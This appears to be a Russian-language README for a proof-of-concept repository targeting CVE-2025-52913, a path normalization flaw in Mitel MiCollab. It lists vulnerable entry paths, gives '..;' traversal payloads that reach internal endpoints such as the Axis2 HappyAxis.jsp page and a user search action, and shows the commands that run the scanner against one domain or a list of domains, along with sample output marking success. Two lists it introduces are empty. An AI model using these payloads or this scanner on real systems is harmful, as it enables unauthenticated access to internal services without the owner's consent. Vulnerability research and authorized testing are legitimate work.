
Доказательство концепции (PoC) для CVE-2025-52913, уязвимость нормализации пути, затрагивающая Mitel MiCollab.
Этот репозиторий содержит доказательство концепции (PoC) для CVE-2025-52913 — уязвимости нормализации пути, затрагивающей Mitel MiCollab.
Проблема позволяет неаутентифицированным злоумышленникам обходить предполагаемые ограничения пути, используя специально созданные последовательности URL, такие как ..;, что приводит к доступу к внутренним конечным точкам приложения.
Успешная эксплуатация может позволить:
Уязвимость может быть вызвана следующими путями:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Примеры обходных полезных нагрузок:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Цель вероятно уязвима, если:
Сервер отвечает с HTTP 200
Ответ содержит:
Axis2Axis2 Happiness PageУязвимость возникает из-за неправильной нормализации специально созданных путей, содержащих ..;, что позволяет выйти за пределы предполагаемого контекста приложения.
Такое поведение может раскрыть внутренние сервисы, такие как:
Обнаружено Dahmani Toumi
Этот проект предназначен только для образовательных целей и авторизованного тестирования безопасности.
Не используйте этот инструмент против систем без явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб.